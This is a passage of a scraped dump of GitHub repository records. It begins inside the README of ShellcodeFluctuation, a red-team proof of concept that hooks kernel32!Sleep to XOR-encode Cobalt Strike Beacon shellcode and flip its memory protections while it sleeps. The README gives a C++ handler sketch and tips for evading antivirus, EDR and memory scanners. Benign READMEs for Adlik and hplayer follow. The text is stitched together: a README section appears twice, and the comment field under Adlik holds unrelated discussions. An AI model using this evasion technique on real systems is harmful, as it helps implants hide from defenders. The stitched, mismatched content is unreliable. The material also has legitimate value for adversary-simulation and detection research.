products do).\n\nAnother argument might be that commercial frameworks integrate these sorts of logic into their _Reflective Loaders_, whereas here we leave it in the EXE harness instead.\nThat's true, but the reason for such a decision is twofold:\n\n1. I need to be really careful with releasing this kind of technology to avoid the risk of helping weaponize real-world criminals with an implementation that will haunt us back with another Petya. In that manner I decided to skip some of the gory details that I use in my professional tooling used to deliver commercial, contracted Adversary Simulation exercises. Hopefully, giving out the seed will be met by community professionals able to grow the concept in their own toolings, assuming they have the appropriate skills.\n\n2. I'd far prefer to move this entire logic to the [_User-Defined Reflective Loader_](https://www.cobaltstrike.com/help-user-defined-reflective-loader) of Cobalt Strike, facilitating Red Team groups with elevated chances in their delivery phase. But firstly, see point (1); secondly, that technology is currently limited to 5KB in size for their RDLLs, making me completely unable to implement it there as well. 
\n\nFor a comprehensive explanation of how Moneta, this process injection implementation and the related IOCs work under the hood, read the following top-quality articles by **Forrest Orr**:\n\n1. [Masking Malicious Memory Artifacts \u2013 Part I: Phantom DLL Hollowing](https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing)\n2. [Masking Malicious Memory Artifacts \u2013 Part II: Blending in with False Positives](https://www.forrest-orr.net/post/masking-malicious-memory-artifacts-part-ii-insights-from-moneta)\n3. [Masking Malicious Memory Artifacts \u2013 Part III: Bypassing Defensive Scanners](https://www.cyberark.com/resources/threat-research-blog/masking-malicious-memory-artifacts-part-iii-bypassing-defensive-scanners)\n\nThat's truly outstanding research and documentation by Forrest - great work, pal!\n\nThe second article in particular outlines the justification for this detection, as Forrest explains:\n\n> In the event that the module had been legitimately loaded and added to the PEB, the shellcode implant would still have been detected due to the 0x1000 bytes (1 page) of memory privately mapped into the address space and retrieved by Moneta by querying its working set - resulting in a modified code IOC as seen above.\n\n\nTo summarise, we're leaving an IOC behind - but should we be worried about it?\nEven though there's an IOC, there are no stolen bytes visible, so there's no immediate reference pointing back to our shellcode and nothing distinguishing our shellcode's technique from others.\n\nLong story short - we shouldn't really be worried about that IOC. :-)\n\n\n### But commercial frameworks leave no IOCs\n\nOne could say that this implementation is far from perfect because it still leaves IOCs behind, while commercial products appear to exhibit no similar traits.\n\nWhen that argument is on the table, I need to point out that commercial frameworks have complete control over the source code of their implants and shellcode loaders, and can therefore integrate the two nicely, avoiding the need to hook and hack around their own shellcode. Here, we need to hook `kernel32!Sleep` to intercept Cobalt Strike's Beacon just before it falls asleep, so that we can kick in with our housekeeping. If there was a better mechanism for kicking in without having to hook `Sleep` - that would be perfect.\n\nThere is the notion of a [_Sleep Mask_](https://www.cobaltstrike.com/help-sleep-mask-kit) introduced to Cobalt Strike, but its size restriction of a few hundred bytes makes it impossible to fit this logic into the mask itself (otherwise we could avoid hooking `Sleep` as well, leaving no IOCs just like commercial products do).\n\nAnother argument might be that commercial frameworks integrate this sort of logic into their _Reflective Loaders_, whereas here we leave it in the EXE harness.\nThat's true, but the reason for such a decision is twofold:\n\n1. I need to be really careful with releasing this kind of technology, to avoid the risk of helping weaponize real-world criminals with an implementation that will haunt us back with another Petya. For that reason I decided to skip some of the gory details that I use in my professional tooling used to deliver commercial, contracted Adversary Simulation exercises. Hopefully, giving out the seed will be met with community professionals able to grow the concept in their own tooling, assuming they have the appropriate skills.\n\n2. I'd far prefer to move this entire logic into Cobalt Strike's [_User-Defined Reflective Loader_](https://www.cobaltstrike.com/help-user-defined-reflective-loader), improving Red Teams' chances during their delivery phase. But firstly, see point (1); secondly, that technology is currently limited to 5KB for RDLLs, making it impossible to implement this logic there as well.\n\nThose of us who build custom C2s & implants for in-house Adversary Simulation engagements now have a sample implementation that will surely help them embellish their tooling accordingly.\n\n---\n\n## How do I use it?\n\nLook at the code and its implementation, understand the concept and re-implement it within your own shellcode loaders that you utilise to deliver your Red Team engagements.\nThis is yet another technique for advanced in-memory evasion that increases your team's chances of not getting caught by Anti-Viruses, EDRs and malware analysts taking a look at your implants.\n\nWhile developing your advanced shellcode loader, you might also want to implement:\n\n- **Process Heap Encryption** - take inspiration from this blog post: [Hook Heaps and Live Free](https://www.arashparsa.com/hook-heaps-and-live-free/) - which can let you evade Beacon configuration extractors like [`BeaconEye`](https://github.com/CCob/BeaconEye)\n- [**Spoof your thread's call stack**](https://github.com/mgeeky/ThreadStackSpoofer) before sleeping (that could evade scanners attempting to examine the process' threads and their call stacks in an attempt to hunt for `MEM_PRIVATE` memory allocations referenced by these threads)\n- **Clear out any leftovers from the Reflective Loader** to avoid in-memory signature detections\n- **Unhook everything you might have hooked** (such as AMSI, ETW, WLDP) before sleeping and then re-hook afterwards.\n\n---\n\n## Example run\n\nUse case:\n\n```\nUsage: ShellcodeFluctuation.exe <shellcode path> <mode>\n<mode>:\n    -1 - Read shellcode but don't inject it. Run in an infinite loop.\n     0 - Inject the shellcode but don't hook kernel32!Sleep and don't encrypt anything\n     1 - Inject shellcode and start fluctuating its memory with standard PAGE_READWRITE.\n     2 - Inject shellcode and start fluctuating its memory with ORCA666's PAGE_NOACCESS.\n```\n\nWhere:\n- `<shellcode path>` is a path to the shellcode file\n- `<mode>` as described above, takes `-1`, `0`, `1` or `2`\n\n\nExample run that fluctuates the beacon's shellcode memory:\n\n```\nC:\\> ShellcodeFluctuation.exe ..\\..\\tests\\beacon64.bin 1\n\n[.] Reading shellcode bytes...\n[.] Hooking kernel32!Sleep...\n[.] Injecting shellcode...\n[+] Shellcode is now running. PID = 9456\n[+] Fluctuation initialized.\n    Shellcode resides at 0x000002210C091000 and occupies 176128 bytes. XOR32 key: 0x1e602f0d\n[>] Flipped to RW. Encoding...\n\n===> MySleep(5000)\n\n[.] Decoding...\n[>] Flipped to RX.\n[>] Flipped to RW. Encoding...\n\n===> MySleep(5000)\n```
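\n\nThe fluctuation itself boils down to flipping the shellcode's page protections and XOR-encoding its bytes around every sleep. A minimal, hypothetical sketch of such a hooked sleep handler follows (illustrative only - names like `g_shellcodeAddr`, `g_shellcodeSize` and `g_xorKey` are assumed globals set at injection time, and the `kernel32!Sleep` unhook/re-hook dance shown earlier is omitted):\n\n```\n#include <windows.h>\n\n// Assumed to be populated by the injector (illustrative, not the project's exact code).\nLPVOID g_shellcodeAddr = nullptr;\nSIZE_T g_shellcodeSize = 0;\nDWORD  g_xorKey        = 0x1e602f0d;\n\nstatic void xor32(BYTE* buf, SIZE_T size, DWORD key)\n{\n    for (SIZE_T i = 0; i < size; i++)\n        buf[i] ^= ((BYTE*)&key)[i % sizeof(key)];\n}\n\nvoid WINAPI MySleep(DWORD dwMilliseconds)\n{\n    DWORD old = 0;\n\n    // Flip shellcode pages to RW and encode them, so that no executable,\n    // plaintext shellcode sits in memory while the beacon sleeps.\n    VirtualProtect(g_shellcodeAddr, g_shellcodeSize, PAGE_READWRITE, &old);\n    xor32((BYTE*)g_shellcodeAddr, g_shellcodeSize, g_xorKey);\n\n    ::Sleep(dwMilliseconds);\n\n    // Decode and flip back to RX before returning into the shellcode.\n    xor32((BYTE*)g_shellcodeAddr, g_shellcodeSize, g_xorKey);\n    VirtualProtect(g_shellcodeAddr, g_shellcodeSize, PAGE_EXECUTE_READ, &old);\n}\n```\n\nMode `2` presumably follows the same pattern but keeps the region `PAGE_NOACCESS` instead of `PAGE_READWRITE` while asleep, so even read attempts by a scanner would fault.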
\n\n---\n\n## Word of caution\n\nIf you plan on adding this functionality to your own shellcode loaders / tooling, be sure to **AVOID** unhooking `kernel32.dll`.\nAn attempt to unhook `kernel32` will restore the original `Sleep` functionality, preventing our callback from being called.\nIf our callback is not called, the thread will be unable to spoof its own call stack by itself.\n\nIf that's what you want to have, then you might need to run another, watchdog thread, making sure that the Beacon's thread gets spoofed whenever it sleeps.\n\nIf you're using Cobalt Strike and the `unhook-bof` BOF by Raphael Mudge, be sure to check out my [Pull Request](https://github.com/Cobalt-Strike/unhook-bof/pull/1) that adds an optional parameter to the BOF specifying libraries that should not be unhooked.\n\nThis way you can maintain your hooks in kernel32:\n\n```\nbeacon> unhook kernel32\n[*] Running unhook.\n    Will skip these modules: wmp.dll, kernel32.dll\n[+] host called home, sent: 9475 bytes\n[+] received output:\nntdll.dll <.text>\nUnhook is done.\n```\n\n[Modified `unhook-bof` with an option to ignore specified modules](https://github.com/mgeeky/unhook-bof)\n\n---\n\n## Final remark\n\nThis PoC was designed to work with Cobalt Strike's Beacon shellcode. The Beacon is known to call out to `kernel32!Sleep` to await further instructions from its C2. \nThis loader leverages that fact by hooking `Sleep` in order to perform its housekeeping. \n\nThis implementation might not work with other shellcodes on the market (such as _Meterpreter_) if they don't use `Sleep` to cool down. \nSince this is merely a _Proof of Concept_ showing the technique, I don't intend to add support for any other C2 framework.\n\nOnce you understand the concept, you'll surely be able to translate it to your shellcode's requirements and adapt the solution to your advantage.\n\nPlease do not open GitHub issues along the lines of \"this code doesn't work with XYZ shellcode\" - they'll be closed immediately.\n\n---\n\n### \u2615 Show Support \u2615\n\nThis and other projects are the outcome of sleepless nights and **plenty of hard work**. If you like what I do and appreciate that I always give back to the community,\n[consider buying me a coffee](https://github.com/sponsors/mgeeky) _(or better, a beer)_ - just to say thank you! 
\ud83d\udcaa \n\n---\n\n## Author\n\n``` \n   Mariusz Banach / mgeeky, 21\n \n   (https://github.com/mgeeky)\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Adlik/Adlik", "link": "https://github.com/Adlik/Adlik", "tags": ["deep-learning", "inference", "tensorflow-serving", "openvino", "tensorrt", "compiler", "inference-engine", "model-optimizer", "docker-images"], "stars": 648, "description": "Adlik: Toolkit for Accelerating Deep Learning Inference", "lang": "C++", "repo_lang": "", "readme": "# Adlik\n\n[![Build Status](https://dev.azure.com/Adlik/GitHub/_apis/build/status/Adlik.Adlik?branchName=master)](https://dev.azure.com/Adlik/GitHub/_build/latest?definitionId=1&branchName=master)\n[![Tests](https://img.shields.io/azure-devops/tests/Adlik/GitHub/1/master)](https://dev.azure.com/Adlik/GitHub/_build/latest?definitionId=1&branchName=master)\n[![Coverage](https://img.shields.io/azure-devops/coverage/Adlik/GitHub/1/master)](https://dev.azure.com/Adlik/GitHub/_build/latest?definitionId=1&branchName=master)\n[![Bors enabled](https://bors.tech/images/badge_small.svg)](https://app.bors.tech/repositories/20625)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/4513/badge)](https://bestpractices.coreinfrastructure.org/projects/4513)\n\n***Adlik*** [\u00e6dlik] is an end-to-end optimizing framework for deep learning models. The goal of Adlik is to accelerate the deep learning inference process both in cloud and embedded environments.\n\n![Adlik schematic diagram](resources/arch.png)\n\nWith the Adlik framework, different deep learning models can be deployed to different platforms with high performance in a flexible and easy way.\n\n![Using Adlik to Deploy Models in Cloud/Edge/Device](resources/deployment.png)\n\n1. In a cloud environment, the compiled model and the Adlik Inference Engine should be built into a docker image and deployed as a container.\n\n2. In an edge environment, the Adlik Inference Engine should be deployed as a container. The compiled model should be transferred to the edge environment, and the Adlik Inference Engine should automatically update and load the model.\n\n3. In a device environment, the Adlik Inference Engine and the compiled model should be compiled into a binary file (***so*** or ***lib***). Users who want to run model inference on the device should link their user-defined AI function and the Adlik binary into the executable, and run it directly.\n\n## [Inference performance of Adlik](https://github.com/Adlik/Adlik/tree/master/benchmark#inference-performance-of-adlik)\n\nWe test the inference performance of Adlik on the same CPU or GPU using a simple CNN model (the MNIST model), the ResNet50 model, and InceptionV3 with different serving engines. 
The test performance data of Adlik on different models is as follows:\n\n- [The test result of the MNIST model](https://github.com/Adlik/Adlik/tree/master/benchmark#the-test-result-of-the-mnist-model)\n- [The test result of the ResNet50 model](https://github.com/Adlik/Adlik/tree/master/benchmark#the-test-result-of-the-resnet50-model)\n- [The test result of the InceptionV3 model](https://github.com/Adlik/Adlik/tree/master/benchmark#the-test-result-of-the-inceptionv3-model)\n- [The test result of the YoloV3 model](https://github.com/Adlik/Adlik/tree/master/benchmark#the-test-result-of-the-YoloV3-model)\n- [The test result of the Bert model](https://github.com/Adlik/Adlik/tree/master/benchmark#the-test-result-of-the-Bert-model)\n- [The test result of the PaddlePaddle model](benchmark/PADDLE_RESULT.md)\n\n## Contents\n\n### [Model Optimizer](https://github.com/Adlik/model_optimizer/blob/master/README.md)\n\n***Model optimizer*** focuses on specific hardware and runs on it to achieve acceleration. The proposed framework mainly consists of two categories of algorithm components, i.e. pruners and quantizers.\n\n### [Model Compiler](model_compiler/README.md)\n\n***Model compiler*** supports several optimizing technologies like pruning, quantization and structural compression, which can be easily used for models developed with TensorFlow, Keras, PyTorch, etc.\n\n### [Serving Engine](adlik_serving/README.md)\n\n***Serving Engine*** provides deep learning models with an optimized runtime based on the deployment environment. Put simply, starting from a deep learning model, the users of Adlik can optimize it with the model compiler and then deploy it to a certain platform with the Adlik serving platform.\n\n## Getting Started\n\n- [Tutorials](TUTORIALS.md)\n\n- [Samples](examples)\n\n## Docker images\n\nAll Adlik compiler images and serving images are stored in [Alibaba Cloud](https://free.aliyun.com/). These images can be downloaded and used directly; users do not need to build Adlik on [Ubuntu](https://ubuntu.com). Users can use the compiler images to compile models from H5, CheckPoint, FrozenGraph, ONNX and SavedModel to OpenVINO, TensorFlow, TensorFlow Lite and TensorRT. Users can also use the serving images for model inference.\n\nDocker pull command:\n\n ```shell script\n docker pull docker_image_name:tag\n ```\n\n### Compiler docker images\n\nThe compiler docker images can be used on CPU and GPU. On the CPU, you can compile a model from its source type to a TensorFlow model, an OpenVINO model or a TensorFlow Lite model. On the GPU, you can compile a model from its source type to a TensorFlow model or a TensorRT model. The name and label of the compiler image are shown below; the first half of the label represents the version of TensorRT, the latter part the version of CUDA:\n\nregistry.cn-beijing.aliyuncs.com/adlik/model-compiler:v0.5.0_trt7.2.1.6_cuda11.0\n\n#### Using the model compiler image to compile a model\n\n1. Run the image.\n\n ```shell script\n docker run -it --rm -v source_model:/mnt/model\n registry.cn-beijing.aliyuncs.com/adlik/model-compiler:v0.5.0_trt7.2.1.6_cuda11.0 bash\n ```\n\n2. 
Configure the json file or environment variables required to compile the model.\n\n   The [config_schema.json](model_compiler/config_schema.json) describes the json file fields; for an example, see [compiler_json_example.json](docker-images/compiler_json_example.json).\n   For the environment variable field description, see [env_field.txt](docker-images/env_field.txt); for an example, see [compiler_env_example.txt](docker-images/compiler_env_example.txt).\n\n   Note: A checkpoint model must be given its input and output op names when compiling; other models can be compiled without them.\n\n3. Compile the model.\n\n   Compilation instructions (json file mode):\n\n   ```shell script\n   python3 \"-c\" \"import json; import model_compiler as compiler; file=open('/mnt/model/serving_model.json','r');\n   request = json.load(file);compiler.compile_model(request); file.close()\"\n   ```\n\n   Compilation instructions (environment variable mode):\n\n   ```shell script\n   python3 \"-c\" \"import model_compiler.compiler as compiler;compiler.compile_from_env()\"\n   ```\n\n### Serving docker images\n\nThe serving docker images contain CPU and GPU images. The label of the openvino image represents the version of OpenVINO. For the TensorRT image, the first half of the label represents the version of TensorRT and the latter part the version of CUDA. The names and labels of the serving images are as follows:\n\nCPU:\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-tflite-cpu:v0.5.0\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-tensorflow-cpu:v0.5.0\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-openvino:v0.5.0\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-libtorch-cpu:v0.5.0\n\nGPU:\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-tftrt-gpu:v0.5.0\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-tensorrt:v0.5.0_trt7.2.1.6_cuda11.0\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-libtorch-gpu:v0.5.0\n\n### Using the serving images for model inference\n\n1. Run the image and make sure to map the service port.\n\n ```shell script\n docker run -it --rm -p 8500:8500 -v compiled_model:/model\n registry.cn-beijing.aliyuncs.com/adlik/serving-openvino:v0.5.0 bash\n ```\n\n2. Load the compiled model in the image and start the service.\n\n ```shell script\n adlik-serving --grpc_port=8500 --http_port=8501 --model_base_path=/model\n ```\n\n3. Install the client wheel package [adlik serving package](\n ) or [adlik\n serving gpu package](\n ) locally, then execute the inference code and perform inference.\n\nNote: If the service port is not mapped when you run the image, you need to install the [adlik serving package](\n ) or [adlik\n serving gpu package](\n ) in the container. Then execute the inference code and perform inference in the container.\n\n## Build\n\nThis guide is for building Adlik on [Ubuntu](https://ubuntu.com) systems.\n\nFirst, install [Git](https://git-scm.com/download) and [Bazel](https://docs.bazel.build/install.html).\n\nThen, clone Adlik and change the working directory into the source directory:\n\n ```sh\n git clone https://github.com/Adlik/Adlik.git\n cd Adlik\n ```\n\n### Build clients\n\n1. Install the following packages:\n - `python3-setuptools`\n - `python3-wheel`\n2. Build clients:\n\n ```sh\n bazel build //adlik_serving/clients/python:build_pip_package -c opt\n ```\n\n3. 
Build pip package:\n\n ```sh\n mkdir /tmp/pip-packages && bazel-bin/adlik_serving/clients/python/build_pip_package /tmp/pip-packages\n ```\n\n### Build serving\n\nFirst, install the following packages:\n\n- `automake`\n- `libtbb2`\n- `libtool`\n- `make`\n- `python3-six`\n\n#### Build serving with OpenVINO runtime\n\n1. Install `openvino-` package from\n [OpenVINO](https://docs.openvinotoolkit.org/2022.1/openvino_docs_install_guides_installing_openvino_apt.html).\n2. Assume the installation path of OpenVINO is `/opt/intel/openvino_VERSION`, run the following command:\n\n ```sh\n export INTEL_CVSDK_DIR=/opt/intel/openvino_2022\n export InferenceEngine_DIR=$INTEL_CVSDK_DIR/runtime/cmake\n bazel build //adlik_serving \\\n --config=openvino \\\n -c opt\n ```\n\n#### Build serving with TensorFlow CPU runtime\n\n1. Run the following command:\n\n ```sh\n bazel build //adlik_serving \\\n --config=tensorflow-cpu \\\n -c opt\n ```\n\n#### Build serving with TensorFlow GPU runtime\n\nAssume building with CUDA version 11.0.\n\n1. Install the following packages from\n [here](https://docs.nvidia.com/cuda/cuda-installation-guide-linux/index.html#ubuntu-installation) and\n [here](https://docs.nvidia.com/deeplearning/sdk/cudnn-install/index.html#ubuntu-network-installation):\n\n - `cuda-nvprune-11-0`\n - `cuda-nvtx-11-0`\n - `cuda-cupti-dev-11-0`\n - `libcublas-dev-11-0`\n - `libcudnn8=*+cuda11.0`\n - `libcudnn8-dev=*+cuda11.0`\n - `libcufft-dev-11-0`\n - `libcurand-dev-11-0`\n - `libcusolver-dev-11-0`\n - `libcusparse-dev-11-0`\n - `libnvinfer7=7.2.*+cuda11.0`\n - `libnvinfer-dev=7.2.*+cuda11.0`\n - `libnvinfer-plugin7=7.2.*+cuda11.0`\n - `libnvinfer-plugin-dev=7.2.*+cuda11.0`\n\n2. Run the following command:\n\n ```sh\n env TF_CUDA_VERSION=11.0 TF_NEED_TENSORRT=1 \\\n bazel build //adlik_serving \\\n --config=tensorflow-gpu \\\n -c opt \\\n --incompatible_use_specific_tool_files=false\n ```\n\n#### Build serving with TensorFlow Lite CPU runtime\n\n1. Run the following command:\n\n ```sh\n bazel build //adlik_serving \\\n --config=tensorflow-lite-cpu \\\n -c opt\n ```\n\n#### Build serving with TensorRT runtime\n\nAssume building with CUDA version 11.0.\n\n1. Install the following packages from\n [here](https://docs.nvidia.com/cuda/cuda-installation-guide-linux/index.html#ubuntu-installation) and\n [here](https://docs.nvidia.com/deeplearning/sdk/cudnn-install/index.html#ubuntu-network-installation):\n\n - `cuda-cupti-dev-11-0`\n - `cuda-nvml-dev-11-0`\n - `cuda-nvrtc-11-0`\n - `libcublas-dev-11-0`\n - `libcudnn8=*+cuda11.0`\n - `libcudnn8-dev=*+cuda11.0`\n - `libcufft-dev-11-0`\n - `libcurand-dev-11-0`\n - `libcusolver-dev-11-0`\n - `libcusparse-dev-11-0`\n - `libnvinfer7=7.2.*+cuda11.0`\n - `libnvinfer-dev=7.2.*+cuda11.0`\n - `libnvonnxparsers7=7.2.*+cuda11.0`\n - `libnvonnxparsers-dev=7.2.*+cuda11.0`\n2. Run the following command:\n\n ```sh\n env TF_CUDA_VERSION=11.0 \\\n bazel build //adlik_serving \\\n --config=TensorRT \\\n -c opt \\\n --action_env=LIBRARY_PATH=/usr/local/cuda-11.0/lib64/stubs \\\n --incompatible_use_specific_tool_files=false\n ```\n\n#### Build serving with TF-TRT runtime\n\nAssume building with CUDA version 11.0.\n\n1. 
Install the following packages from\n   [here](https://docs.nvidia.com/cuda/cuda-installation-guide-linux/index.html#ubuntu-installation) and\n   [here](https://docs.nvidia.com/deeplearning/sdk/cudnn-install/index.html#ubuntu-network-installation):\n\n   - `cuda-cupti-dev-11-0`\n   - `libcublas-dev-11-0`\n   - `libcudnn8=*+cuda11.0`\n   - `libcudnn8-dev=*+cuda11.0`\n   - `libcufft-dev-11-0`\n   - `libcurand-dev-11-0`\n   - `libcusolver-dev-11-0`\n   - `libcusparse-dev-11-0`\n   - `libnvinfer7=7.2.*+cuda11.0`\n   - `libnvinfer-dev=7.2.*+cuda11.0`\n   - `libnvinfer-plugin7=7.2.*+cuda11.0`\n   - `libnvinfer-plugin-dev=7.2.*+cuda11.0`\n\n2. Run the following command:\n\n   ```sh\n   env TF_CUDA_VERSION=11.0 TF_NEED_TENSORRT=1 \\\n       bazel build //adlik_serving \\\n           --config=tensorflow-tensorrt \\\n           -c opt \\\n           --incompatible_use_specific_tool_files=false\n   ```\n\n#### Build serving with TVM runtime\n\n1. Install the following packages:\n\n   - `build-essential`\n   - `cmake`\n   - `tvm`\n\n2. Run the following command:\n\n   ```sh\n   bazel build //adlik_serving \\\n       --config=tvm \\\n       -c opt\n   ```\n\n### Build in Docker\n\nThe `ci/docker/build.sh` file can be used to build a Docker image that contains all the requirements for building Adlik. You can build Adlik with that Docker image.\n\n> Note: If you build the runtime with GPU in a Docker image, you need to add the CUDA environment variables in the\n> Dockerfile, such as:\n>\n> ```dockerfile\n> ENV NVIDIA_VISIBLE_DEVICES all\n> ENV NVIDIA_DRIVER_CAPABILITIES compute, utility\n> ```\n\n### Release\n\nThe versions of the serving engines that Adlik supports:\n\n| | TensorFlow 1.14 | TensorFlow 2.x | OpenVINO 2022 | TensorRT 6 | TensorRT 7 |\n| ------------ | :-------------: | :------------: | :-----------: | :--------: | :--------: |\n| Keras | \u2713 | \u2713 | \u2713 | \u2713 | \u2713 |\n| TensorFlow | \u2713 | \u2713 | \u2713 | \u2713 | \u2713 |\n| PyTorch | \u2717 | \u2717 | \u2713 | \u2713 | \u2713 |\n| PaddlePaddle | \u2713 | \u2713 | \u2713 | \u2713 | \u2713 |\n\n## License\n\nApache License 2.0\n", "readme_type": "markdown", "hn_comments": "Previous post or links from previous posts I found useful:https://news.ycombinator.com/item?id=26243107https://codeburst.io/tech-stack-how-i-quickly-developed-and-...https://medium.com/saveboost/how-i-chose-our-startup-stack-7...The next one that tells me they are alike will get me to agree:\n both software projects and building projects are: - always late and \n - always more expensive than planned.\n\nI guess that's not what they wanted to hear.\n(honestly, it's a poor metaphor)I think there\u2019s a large disservice in comparing architecture and construction in the real world to software.Software is more like keeping quicksand in your hands.The construction of houses take mature engineering principles and calculations of a physical world to create buildings standing for centuries.Most (not all) changes after construction is veneer - on the surface and replacing of bits 1:1.Software on the other hand need constant attention and massive changes to the very foundation is not uncommon. It might go as deep as a change in hardware, say moving from one arch to another, or changing of the software architecture such as moving to a distributed, eventually consistent persistence layer or vice versa.It\u2019s not like concrete stops functioning if you don\u2019t keep touching it either. 
Don\u2019t get me started on build pipelines, testing, integrations etc etcAnd next up: product!\nYesterday we thought it was a new empire state building buuuut it turned out we need to build a modern day coliseum.Followed by \u201cproject management\u201d - this may be the most obvious sign that we\u2019re off in comparison. A building need project management! Software on the other hand is often ruined by it, as software is supposed to be malleable.One is soft, the other is hard.Trying to liken software production to building construction is something I\u2019ve seen create various problems in this field of ours for a long time.Why even think about software as a building at all? Just think about it as software. I don't understand the urge to draw parallels to other fields.Software systems have always felt more organic to me than any building. A building will go years without any major changes or renovations. Your average modern software application sees multiple changes per day. And the functionality of the software evolves quite iteratively and rapidly over time. It also has to respond to various environmental stresses.It seems another metaphor to describe \"pace layering\" in complex system.\nHere's an article I always liked on the topic and inspired me years ago: https://jods.mitpress.mit.edu/pub/issue3-brand/release/2I often ended up applying this simple principle to software, especially design systems, e.g. in atomic design where atom, molecules, organism, etc. Can be developed as layers with different pace of change and optimized around it.I'm curious if anybody knows where the concept came from originally. Was there already something like that in Greek philosophy, or was introduced with the study of complex systems? Or maybe it was indeed from architecture?> Layers of change: How buildings and software are alike\"If Builders Built Buildings the Way Programmers Wrote Programs, Then the First Woodpecker That Came Along Would Destroy Civilization\"My daughter is in 3rd grade and is bored with her math lessons, so I started to do my own nightly math lessons. Long division was a big hit, but what I really want is to find some accessable number theory material, preferably about interesting patterns. Any recommendations?Probably something in the 10-15 age range, or 8-10 and originally in RussianQuanta is doing really solid science journalism these days. They have a number of fantastic podcasts as well.It's bankrolled 100% by this generous billionaire\nhttps://en.wikipedia.org/wiki/Jim_Simons_(mathematician) and I hope he continues to fund itThis guy has Sitzfleisch, a very useful thing for a mathematician to have.Weird how this came out on the day I bomb my probability test. T_TCongratulations to him! That's an amazing accomplishment. There's a lesson in this line> For more than a year and a half, Larsen couldn\u2019t stop thinking about a certain math problem.It's rare to be able to focus on something for that long without giving up.Summary:1. Fermat's Little Theorem: if p is prime, then b^p = b (mod p) for all integers b. i.e. b^p - b is always a multiple of p. 8^3-8 = 512-8 = 504 = 168 x 3.2. Is the inverse true? Does b^n - b = 0 (mod n) mean that n is prime? No. Sometimes n is non-prime (like n=561, divisible by 3). We call these n, Carmichael numbers.3. Okay, so these numbers exist. How common are they? For primes we know they're common. Bertrand postulated (Chebyshev proved) that for any n>1, there is a prime p between n and 2n. That's cool!4. 
Is it true that there is such a bound for these pretend-primes? Well, we have an interesting fact that there are x^(1/3) of them below any x, once we pass a certain point (i.e. there exists an X such that there are x^(1/3) of them below any x > X) so that makes us think it could be true! Worth seeing!5. But what about this common-ness measure like the B-C result for primes? Well, it turns out that it exists. It ain't as pretty as just between straight integer multiples, but the fact that it exists in some shape at all is cool! That's what this kid proved. Absolutely rollicking fact. https://arxiv.org/abs/2111.06963I've known quite a few families where both parents are scientists or software engineers or quantitative engineers.Very frequently, their children will have a scary intuitive understanding of concepts that took my many years to understand (I'm a slow learner; didn't really understand hash tables until my 30s) and then apply their abilities to be in the higher echelons at science in a very young age. I see a similar thing in the children of world-class athletes.very impressive to have such fundamental contributions at such an early age. To even know it's applicability to modern day cryptography is also really impressive. All the best to Daniel Larsen!Nobody is talking about the proof, but about the fact that the person who produced it was younger than them and they are trying to explain the achievement by innate abilities or parent influence. The fact is just that most of people don't want to do something like that. They just want to be someone who do things like that.Congratulations! This is a great achievement at his age. Maybe a Fields medal next?Getting older, sometimes it can be so tough to accept the fact that people a fraction of your age achieve things you never will.Given the extreme connectivity of the present, we are also exposed to brilliant minds with incredible capabilities, making us (me at least) feel even more incapable..I guess it is a lesson for humility.Good job Daniel, you show us !I knew a guy in high school that carried around a sub-compact notebook and one day in science class we were learning about how to factor quadratic equations (a review of old math we should know) and this guy was not paying attention at all, just typing away. The teacher asked him what he was doing that was so important that he couldn't listen, and to please come up and solve the problem.This kid walked straight up to the board and explained how you can design a computer program to factor any polynomial equation string input to it, and in fact had implemented a polynomial equation factoring program while the teacher explained how to factor simple quadratic equations.Since then, I don't feel bad if someone achieves more than me, because clearly there are some people out there that are born to solve certain classes of problems (maybe their brain structure is better for those, or something, who knows).TL;DR - a Nigerian street vendor was brutally murdered in broad daylight on the streets of Italy. People just stood by and recorded the video but no one intervened. A neo-fascist, Giorgia Meloni, is expected to become the next PM of Italy after the September elections.Unpaywalled: https://archive.ph/OMeDaJournal Reference: https://www.cell.com/cell-reports/fulltext/S2211-1247(22)010...Summary:\nThe human face is one of the most visible features of our unique identity as individuals. 
Interestingly, monozygotic twins share almost identical facial traits and the same DNA sequence but could exhibit differences in other biometrical parameters. The expansion of the world wide web and the possibility to exchange pictures of humans across the planet has increased the number of people identified online as virtual twins or doubles that are not family related. Herein, we have characterized in detail a set of \u201clook-alike\u201d humans, defined by facial recognition algorithms, for their multiomics landscape. We report that these individuals share similar genotypes and differ in their DNA methylation and microbiome landscape. These results not only provide insights about the genetics that determine our face but also might have implications for the establishment of other human anthropometric properties and even personality characteristics.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ithewei/hplayer", "link": "https://github.com/ithewei/hplayer", "tags": ["player", "qt", "ffmpeg", "opengl", "opencv"], "stars": 647, "description": "A multi-screen player using Qt + FFmpeg.", "lang": "C++", "repo_lang": "", "readme": "# Multi-screen player\n\n## Requirements\n\n- Make a VLC-like player that can play file sources, network sources, and device capture sources;\n- The interface requires a multi-screen monitoring grid, which can freely switch between multi-screen styles, and supports dragging and merging;\n\n## Outline Design\n\n- Use Qt to implement the interface;\n- Use FFmpeg to pull streams, encode/decode and transcode;\n- Use OpenCV to process images;\n- Render video frames using OpenGL;\n\n## Detailed Design\n\n**Interface design**\n\n![](hplayer.png)\n\n**Multi-screen renderings**\n\n![](hplayer4.png)\n\n![](hplayer25.png)\n\n## Future plans\n\n- Add monitor capture source;\n- Add picture, text and time overlay functions;\n- Add multi-screen composition function;\n- Add streaming and recording functions;\n- Add face detection and recognition function;\n- Add beautification function;\n\n## Submodule\n```\ngit clone --recurse-submodules https://github.com/ithewei/hplayer.git\n```\nor\n```\ngit clone https://github.com/ithewei/hplayer.git\ngit submodule update --init\n```\n\n## Mirror\n```\nhttps://gitee.com/ithewei/hplayer.git\n```\n\n## Build\n\nSee BUILD.md\n\n## Project Blog\n\nhttps://hewei.blog.csdn.net/article/category/9275796", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Vouk/voukoder", "link": 